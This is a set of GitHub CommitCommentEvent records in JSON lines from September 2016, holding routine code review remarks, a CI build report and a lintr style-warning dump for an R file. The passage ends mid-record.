{"id":"4597132615","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19115920,"position":null,"line":null,"path":null,"commit_id":"b9f5a13fcff3e570ae4a3e75442a010cbad413a7","created_at":"2016-09-21T15:46:12Z","updated_at":"2016-09-21T15:46:12Z","body":"@panzergame: Now it works fine :) I have excellent performance results (even a bit better than in my branch I think) in the files I tested. We absolutely need this in 0.1.0!"}},"created_at":"2016-09-21T15:46:12Z"}
{"id":"4597134582","type":"CommitCommentEvent","actor":{"login":"badbeat2187"},"repo":{"name":"badbeat2187/nikhilswami.github.io"},"payload":{"comment":{"id":19115924,"position":null,"line":null,"path":null,"commit_id":"67909106ffc40a041992c727d59c8ab83c308fb7","created_at":"2016-09-21T15:46:30Z","updated_at":"2016-09-21T15:46:30Z","body":"build the initial homepage"}},"created_at":"2016-09-21T15:46:30Z"}
{"id":"4597138202","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19115932,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T15:47:04Z","updated_at":"2016-09-21T15:47:04Z","body":"@lots0logs Shouldn't it be \r\n\r\n```sh\r\n\t\tcp -t \"${_DIR}\" \\\r\n\t\t\t\"${GTKVER}/dist/gtk.css\" \\\r\n\t\t\t\"${GTKVER}/dist/gtk-dark.css\" \\\r\n\t\t\t\"${GTKVER}/gtk.gresource\" \\\r\n\t\t\t\"${GTKVER}/thumbnail.png\"\r\n```"}},"created_at":"2016-09-21T15:47:04Z"}
{"id":"4597139312","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19115936,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T15:47:14Z","updated_at":"2016-09-21T15:47:14Z","body":"``SaltRenderError`` was not removed, it was moved elsewhere. See [here](https://github.com/terminalmage/salt/commit/f237fe4d528efd621e1f9adbeb149695e94e65a1#diff-e8ecdef70c9c678790ca9e0e07c9ab77R102)."}},"created_at":"2016-09-21T15:47:14Z"}
{"id":"4597147085","type":"CommitCommentEvent","actor":{"login":"KJuls"},"repo":{"name":"WOEP-inc/WOEP-home"},"payload":{"comment":{"id":19115964,"position":null,"line":null,"path":null,"commit_id":"b06d074fb7b108cd48a09664865f1c7426fad918","created_at":"2016-09-21T15:48:25Z","updated_at":"2016-09-21T15:48:25Z","body":"BB, Check for nav-brand class , and style it by increasing the font size "}},"created_at":"2016-09-21T15:48:25Z"}
{"id":"4597152692","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19115992,"position":null,"line":null,"path":null,"commit_id":"9dd0df81a49aa6e37d787aca356533b5599d472c","created_at":"2016-09-21T15:49:17Z","updated_at":"2016-09-21T15:49:17Z","body":"@cybrann , man, look what I found https://github.com/SkyMist/Core/blob/b08a2a48b6a78b0869869539f835c93c4ff7f579/src/server/game/Server/Protocol/Opcodes.h"}},"created_at":"2016-09-21T15:49:17Z"}
{"id":"4597153349","type":"CommitCommentEvent","actor":{"login":"benlarsendk"},"repo":{"name":"TeamAPK/ITTAPK"},"payload":{"comment":{"id":19115993,"position":null,"line":null,"path":null,"commit_id":"c1be50f49503de9e3bf7876fc7b8b6fb4c984a33","created_at":"2016-09-21T15:49:24Z","updated_at":"2016-09-21T15:49:24Z","body":"(Y)"}},"created_at":"2016-09-21T15:49:24Z"}
{"id":"4597153366","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19115994,"position":null,"line":null,"path":null,"commit_id":"58d8c8c8a3c93e32427ed833c6b38934b6fcf1f1","created_at":"2016-09-21T15:49:24Z","updated_at":"2016-09-21T15:49:24Z","body":"Commit f29f65e0f94af54817c737d368a66d6b035859b3 should address this."}},"created_at":"2016-09-21T15:49:24Z"}
{"id":"4597158398","type":"CommitCommentEvent","actor":{"login":"xijo"},"repo":{"name":"jsdf/sprockets-coffee-react"},"payload":{"comment":{"id":19116002,"position":null,"line":null,"path":null,"commit_id":"0da267ff17a2a890bd3098c327f00f35dd660d37","created_at":"2016-09-21T15:50:08Z","updated_at":"2016-09-21T15:50:08Z","body":"@raelgc thanks, good job! :+1:"}},"created_at":"2016-09-21T15:50:08Z"}
{"id":"4597164562","type":"CommitCommentEvent","actor":{"login":"dinosaurfiles"},"repo":{"name":"dinosaurfiles/inhumans-ionic-test"},"payload":{"comment":{"id":19116017,"position":6,"line":43,"path":"www/index.html","commit_id":"d1603d81deea73382e8565ee7b1cb991f346e7f6","created_at":"2016-09-21T15:51:03Z","updated_at":"2016-09-21T15:51:03Z","body":"More like a toggle! @markhamknight  @derick31 "}},"created_at":"2016-09-21T15:51:03Z"}
{"id":"4597166362","type":"CommitCommentEvent","actor":{"login":"bedder"},"repo":{"name":"bedder/ProfBot"},"payload":{"comment":{"id":19116021,"position":242,"line":145,"path":"bot/messenger.py","commit_id":"4542643e5a1c8b632c1bf11dafe6498197f2bb33","created_at":"2016-09-21T15:51:18Z","updated_at":"2016-09-21T15:51:18Z","body":"https://en.wikipedia.org/wiki/Name_of_Ukraine#.22Ukraine.22_versus_.22the_Ukraine.22\r\n\r\n> Since the Declaration of Independence of Ukraine the English-speaking world has changed its usage from \"the Ukraine\" to \"Ukraine\". (...) In 1993 the Ukrainian government requested that the article be dropped.\r\n>\r\n> Referring to the country as \"the Ukraine\" instead of \"Ukraine\" is considered insulting by some Ukrainians. It now implies disregard for the country's sovereignty (...)\r\n\r\nLook mate, keep your politics out of my pull requests!"}},"created_at":"2016-09-21T15:51:18Z"}
{"id":"4597166398","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"jbhuang0604/awesome-computer-vision"},"payload":{"comment":{"id":19116022,"position":8,"line":238,"path":"README.md","commit_id":"38c679de647a33f362eaf262e4b8e9fcaaef8883","created_at":"2016-09-21T15:51:19Z","updated_at":"2016-09-21T15:51:19Z","body":"@jbhuang0604 Your last commit breaks the title ### hierarchy see the \"#### Feature Detection and Extraction\" that appears on the Github parsing of the md file.\r\n\r\nI think that adding an additional newline before the ## will make the thing work as before"}},"created_at":"2016-09-21T15:51:19Z"}
{"id":"4597168112","type":"CommitCommentEvent","actor":{"login":"j0k3r"},"repo":{"name":"wallabag/wallabag"},"payload":{"comment":{"id":19116025,"position":20,"line":20,"path":"src/Wallabag/ImportBundle/Controller/FirefoxController.php","commit_id":"d080658e9d51073a36736f15a10a792afa137771","created_at":"2016-09-21T15:51:34Z","updated_at":"2016-09-21T15:51:34Z","body":"If you enable redis and/or rabbit for that import you should define dedicated config (in `app/config/config.yml`)."}},"created_at":"2016-09-21T15:51:34Z"}
{"id":"4597174481","type":"CommitCommentEvent","actor":{"login":"glavoie"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":19116042,"position":28,"line":36,"path":"web/src/test/java/org/springframework/security/web/firewall/FirewalledResponseTests.java","commit_id":"2e6656e9d3fe99167333a8f6eebb480cac42ca70","created_at":"2016-09-21T15:52:32Z","updated_at":"2016-09-21T15:52:32Z","body":"I think that was fine. JUnit already creates a new instance of the test class for every test to start in a clean state. That's how for example the \"expectedException\" gets reset to ExpectedException.none() at the start of the test."}},"created_at":"2016-09-21T15:52:32Z"}
{"id":"4597174868","type":"CommitCommentEvent","actor":{"login":"dinosaurfiles"},"repo":{"name":"dinosaurfiles/inhumans-ionic-test"},"payload":{"comment":{"id":19116043,"position":11,"line":47,"path":"www/index.html","commit_id":"d1603d81deea73382e8565ee7b1cb991f346e7f6","created_at":"2016-09-21T15:52:37Z","updated_at":"2016-09-21T15:52:37Z","body":"@markhamknight @derick31 this is like the psuedo id of the code as mentioned [here](https://github.com/dinosaurfiles/inhumans-ionic-test/commit/d1603d81deea73382e8565ee7b1cb991f346e7f6#commitcomment-19116017)"}},"created_at":"2016-09-21T15:52:37Z"}
{"id":"4597175961","type":"CommitCommentEvent","actor":{"login":"kazuyoshiw"},"repo":{"name":"kazuyoshiw/blog"},"payload":{"comment":{"id":19116044,"position":4,"line":26,"path":"Gemfile","commit_id":"c39d7e0520927753a30dde41f91f47f1b973f328","created_at":"2016-09-21T15:52:47Z","updated_at":"2016-09-21T15:52:47Z","body":"bootstrap gem　add"}},"created_at":"2016-09-21T15:52:47Z"}
{"id":"4597179229","type":"CommitCommentEvent","actor":{"login":"KJuls"},"repo":{"name":"WOEP-inc/WOEP-home"},"payload":{"comment":{"id":19116053,"position":null,"line":null,"path":null,"commit_id":"b06d074fb7b108cd48a09664865f1c7426fad918","created_at":"2016-09-21T15:53:17Z","updated_at":"2016-09-21T15:53:17Z","body":"I am kinda new interacting much with the git platform , so ...."}},"created_at":"2016-09-21T15:53:17Z"}
{"id":"4597181320","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19116056,"position":5,"line":91,"path":"cura/CuraApplication.py","commit_id":"479f9ea6d237dd02cc8e03d670b758b4a53b7b2e","created_at":"2016-09-21T15:53:35Z","updated_at":"2016-09-21T15:53:35Z","body":"done"}},"created_at":"2016-09-21T15:53:35Z"}
{"id":"4597181999","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19116058,"position":5,"line":16,"path":"Cura.proto","commit_id":"281e647b82ea58d19fa43b833ea9a9d4dba5fba8","created_at":"2016-09-21T15:53:41Z","updated_at":"2016-09-21T15:53:41Z","body":"fixed"}},"created_at":"2016-09-21T15:53:41Z"}
{"id":"4597184024","type":"CommitCommentEvent","actor":{"login":"KJuls"},"repo":{"name":"WOEP-inc/WOEP-home"},"payload":{"comment":{"id":19116063,"position":null,"line":null,"path":null,"commit_id":"b06d074fb7b108cd48a09664865f1c7426fad918","created_at":"2016-09-21T15:54:01Z","updated_at":"2016-09-21T15:54:01Z","body":"I'm hopping to catch up with things in no time \r\n"}},"created_at":"2016-09-21T15:54:01Z"}
{"id":"4597185024","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19116067,"position":100,"line":229,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T15:54:10Z","updated_at":"2016-09-21T15:54:10Z","body":"I agree. Let me drop this comment."}},"created_at":"2016-09-21T15:54:10Z"}
{"id":"4597187524","type":"CommitCommentEvent","actor":{"login":"ChronoTensai"},"repo":{"name":"ChronoTensai/sdl2tetris"},"payload":{"comment":{"id":19116074,"position":32,"line":30,"path":"Project1/Project1/Game.h","commit_id":"ed7640fe88e74073d25f7c1d73d60952956ff1b1","created_at":"2016-09-21T15:54:32Z","updated_at":"2016-09-21T15:54:32Z","body":"Si podria ser, seria lo mismo"}},"created_at":"2016-09-21T15:54:32Z"}
{"id":"4597187917","type":"CommitCommentEvent","actor":{"login":"mattt416"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19116075,"position":14,"line":111,"path":"scripts/test-upgrade.sh","commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-21T15:54:36Z","updated_at":"2016-09-21T15:54:36Z","body":"That is necessary to get the container updated with the new hostname, which otherwise would happen in OSA's run-upgrade.sh script."}},"created_at":"2016-09-21T15:54:36Z"}
{"id":"4597191737","type":"CommitCommentEvent","actor":{"login":"dinosaurfiles"},"repo":{"name":"dinosaurfiles/inhumans-ionic-test"},"payload":{"comment":{"id":19116082,"position":15,"line":51,"path":"www/index.html","commit_id":"d1603d81deea73382e8565ee7b1cb991f346e7f6","created_at":"2016-09-21T15:55:13Z","updated_at":"2016-09-21T15:55:13Z","body":"check docs https://ionicframework.com/docs/api/directive/ionReorderButton/"}},"created_at":"2016-09-21T15:55:13Z"}
{"id":"4597192023","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19116083,"position":null,"line":null,"path":null,"commit_id":"a2b70865948a7c1bc5e1a2a69797aa865c96d45e","created_at":"2016-09-21T15:55:15Z","updated_at":"2016-09-21T15:55:15Z","body":"cpu_boost takes it like that (cluster), msm_performance is newer on 820 that the 810 version, seems liek it only makes it by cpu.\r\nThe string is \"0:0 1:0 2:0 3:0\", unless I'm missing some patch (which I don't think so), you need to enter it complete by cpu, as per driver instructions"}},"created_at":"2016-09-21T15:55:15Z"}
{"id":"4597193483","type":"CommitCommentEvent","actor":{"login":"mattt416"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19116087,"position":12,"line":109,"path":"scripts/test-upgrade.sh","commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-21T15:55:28Z","updated_at":"2016-09-21T15:55:28Z","body":"DEPLOY_CEPH, as far as I am aware, is only used to deploy ceph on an AIO."}},"created_at":"2016-09-21T15:55:28Z"}
{"id":"4597194864","type":"CommitCommentEvent","actor":{"login":"emanoelopes"},"repo":{"name":"emanoelopes/cp2-rails"},"payload":{"comment":{"id":19116088,"position":4,"line":3,"path":"cp2-caelum-apostila/vota_prato/app/views/comentarios/_comentario.html.erb","commit_id":"cd1ceca4c3c482288f6ad92b451366477be6ccb2","created_at":"2016-09-21T15:55:41Z","updated_at":"2016-09-21T15:55:41Z","body":"[apostila, cap14, pg 179]Utilizando AJAX para remoção de comentários: com esta opção um comentário deve ser removido sem sair da página atual, mas isso não está acontecendo. O comentário é removido mas a página é direcionada para os comentários. "}},"created_at":"2016-09-21T15:55:41Z"}
{"id":"4597195771","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19116094,"position":124,"line":251,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T15:55:49Z","updated_at":"2016-09-21T15:55:49Z","body":"Why would it throw \"Address family not supported\"? I thought the `parse` function would just return \"Failed to parse IPv4/v6...\" ??"}},"created_at":"2016-09-21T15:55:49Z"}
{"id":"4597198326","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19116100,"position":null,"line":null,"path":null,"commit_id":"745de0a2c13e2776461c3fd20119b2a31835d73a","created_at":"2016-09-21T15:56:14Z","updated_at":"2016-09-21T15:56:14Z","body":"Ah, my bad. If it's not a lot of work, could you do that?"}},"created_at":"2016-09-21T15:56:14Z"}
{"id":"4597203490","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19116116,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-21T15:57:06Z","updated_at":"2016-09-21T15:57:06Z","body":"121784677-OAControllerFixes4633 (mjwitte) - x86_64-MacOS-10.9-clang: OK (2335 of 2335 tests passed, 569 test warnings)\n\n * 569 tests had: AUD diffs.\n * 11 tests had: RDD diffs.\n * 5 tests had: EIO diffs.\n * 3 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T15:57:06Z"}
{"id":"4597205483","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19116125,"position":143,"line":286,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T15:57:24Z","updated_at":"2016-09-21T15:57:24Z","body":"Since we are doing an explicit cast over here, would prefer have an explicit type instead of `auto`."}},"created_at":"2016-09-21T15:57:24Z"}
{"id":"4597207176","type":"CommitCommentEvent","actor":{"login":"SmallerCoder"},"repo":{"name":"SmallerCoder/Project"},"payload":{"comment":{"id":19116131,"position":null,"line":null,"path":null,"commit_id":"612dd4f2a0fe3fc20c70112acd6c7bb486d5a198","created_at":"2016-09-21T15:57:40Z","updated_at":"2016-09-21T15:57:40Z","body":"images"}},"created_at":"2016-09-21T15:57:40Z"}
{"id":"4597208481","type":"CommitCommentEvent","actor":{"login":"jlongster"},"repo":{"name":"devtools-html/debugger.html"},"payload":{"comment":{"id":19116141,"position":4,"line":11,"path":"docs/mochitests.md","commit_id":"463ae613ce26f65e39bae93d3e97bda1836914c7","created_at":"2016-09-21T15:57:52Z","updated_at":"2016-09-21T15:57:52Z","body":"Oh, you're right!"}},"created_at":"2016-09-21T15:57:52Z"}
{"id":"4597209887","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19116144,"position":86,"line":625,"path":"raw_binary/format_conversion_libs/espa_geoloc.c","commit_id":"1e42a388105e5ceadce0f09fd1cd737ba3dd56e0","created_at":"2016-09-21T15:58:05Z","updated_at":"2016-09-21T15:58:05Z","body":"It does.  I've been working on a fix.\n\n-----------------------------------------------------------------------------------------------------\nGail Schmidt\nSoftware Engineer\nStinger Ghaffarian Technologies (SGT)\nContractor to the U.S. Geological Survey (USGS)\nEarth Resources Observation and Science (EROS) Center\n47914 252nd Street\nSioux Falls, SD 57198\nPhone: 605-593-2272\ngail.schmidt.ctr@usgs.gov\n\nNOTICE:  This email may contain confidential, proprietary, or competition\nsensitive bid or proposal procurement information.  Unauthorized disclosure\nof this information may carry criminal penalties as set forth in the\nProcurement Integrity Act, 41 U.S.C. 423, as amended.  Further, the\nunauthorized disclosure of certain commercial information by civil servants\nmay result in fines or imprisonment under the Trade Secrets Act (18 U.S.C.\n1905).  If you have received this information in error, please delete it,\nincluding all copies, and notify the sender of the error immediately.\n\nOn Wed, Sep 21, 2016 at 9:46 AM, Ronald D. Dilley Jr. <\nnotifications@github.com> wrote:\n\n> I agree, I think this catches the prime meridian as well. Then I think the\n> bounding box searching below would be messed up.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/USGS-EROS/espa-product-formatter/commit/1e42a388105e5ceadce0f09fd1cd737ba3dd56e0#commitcomment-19115919>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AL98_2tGNX9VsmsAr1QKEXCduxG2qGotks5qsVFBgaJpZM4KC5ya>\n> .\n>\n"}},"created_at":"2016-09-21T15:58:05Z"}
{"id":"4597212041","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19116148,"position":null,"line":null,"path":null,"commit_id":"f5c7ba3a98afbb990859a471c8f77d3ba53b3bde","created_at":"2016-09-21T15:58:23Z","updated_at":"2016-09-21T15:58:23Z","body":"[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L16) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:26:68:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:27:54:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:28:12:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:70:40:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:78:21:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:80:46:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:80:60:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:86:52:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L90) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:18:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:13:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:16:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:21:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:26:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:109:16:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:7:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L121) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:121:10:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:23:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:121:29:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           